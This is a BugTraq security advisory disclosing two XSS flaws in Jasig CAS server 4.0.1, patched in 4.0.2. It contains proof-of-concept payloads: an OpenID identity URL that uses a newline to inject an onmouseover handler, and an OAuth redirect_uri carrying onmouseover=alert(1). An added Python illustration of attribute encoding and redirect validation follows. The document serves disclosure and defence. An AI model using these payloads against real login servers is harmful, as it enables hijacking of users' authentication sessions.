BugTraq
Jasig CAS server vulnerabilities Sep 21 2015 12:53PM
Antoni Klajn (antoni d klajn pwr edu pl)
Hi,

Jasig CAS server version 4.0.1 is prone to XSS vulnerabilities.

Timeline:

20.02.2015 - Vendor notified
11.05.2015 - Patches released
21.09.2015 - Bugtraq disclosure

Vulnerable version:

4.0.1

Fixed version:

4.0.2

Vulnerabilities details:

1) XSS in OpenID server

Method:
Paste this URL
https://oauth.example.com/cas/openid/username"[new line]onmouseover="jscode
into the OpenID client and try to log in.
The space character is not allowed, so a newline is used instead.

Example redirection link:
https://oauth.example.com/cas/login?openid.assoc_handle=1422619970824-0&openid.ax.mode=fetch_request&openid.ax.required=email&openid.ax.type.email=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.identity=https%3A%2F%2Foauth.example.com%2Fcas%2Fopenid%2Fusername%22&openid.mode=checkid_setup&openid.return_to=https%3A%2F%2Fclien.example.com%2Faccount%2Fsignin%2Fcomplete%2F%3Fnext%3D%252F%26janrain_nonce%3D2015-09-21T11%253A15%253A10ZiTDjrd%26openid1_claimed_id%3Dhttps%253A%252F%252Foauth.example.com%252Fcas%252Fopenid%252Fusername%2527&openid.trust_root=https%3A%2F%2Fclient.example.com%2F

Result:
<input type="hidden" id="username" name="username" value="username"
onmouseover="jscode" />

2) XSS in OAuth server

Example link:
https://oauth.example.com/cas/oauth2.0/authorize?client_id=<client_id>&redirect_uri="onmouseover=alert(1)%20.trusted-domain.com
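Both findings share one root cause: an attacker-controlled string (the OpenID username, the OAuth redirect_uri) reaches an HTML attribute without attribute encoding. The following is an added illustration, not CAS code and not the vendor's 4.0.2 patch: it renders the hidden input from finding 1 both unencoded and encoded, parses the result the way a browser would to show which attributes survive, and validates a redirect_uri by exact host match against a registered allowlist (the allowlist check, the function names and the hosts are assumptions for the demo).

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed inputs mirroring the advisory's two payloads (placeholders, not live data).
OPENID_USERNAME = 'username"\nonmouseover="jscode'        # newline stands in for the rejected space
OAUTH_REDIRECT_URI = '"onmouseover=alert(1) .trusted-domain.com'


def render_username_field_vulnerable(username: str) -> str:
    """Bug class from finding 1: the value is interpolated into an attribute unencoded."""
    return f'<input type="hidden" id="username" name="username" value="{username}" />'


def render_username_field_fixed(username: str) -> str:
    """HTML-attribute-encode the value so a quote can never close the attribute."""
    safe = html.escape(username, quote=True)
    return f'<input type="hidden" id="username" name="username" value="{safe}" />'


class _InputAttrs(HTMLParser):
    """Collects the attributes a browser would actually see on the <input> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs.update(attrs)


def input_attributes(markup: str) -> dict:
    """Parse rendered markup and return the <input> tag's attribute map."""
    parser = _InputAttrs()
    parser.feed(markup)
    return parser.attrs


def is_allowed_redirect_uri(redirect_uri: str, registered_hosts: frozenset) -> bool:
    """Finding 2 mitigation (assumed design): accept only an absolute https URL whose
    host exactly equals a registered client host. A suffix or substring match would
    accept values like '... .trusted-domain.com'."""
    try:
        parts = urlsplit(redirect_uri)
    except ValueError:
        return False
    if parts.scheme != "https" or not parts.hostname:
        return False
    return parts.hostname.lower() in registered_hosts
```

With the unencoded renderer the parsed tag carries an onmouseover attribute; with the encoded one the whole payload stays inside value and no event handler attribute exists.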
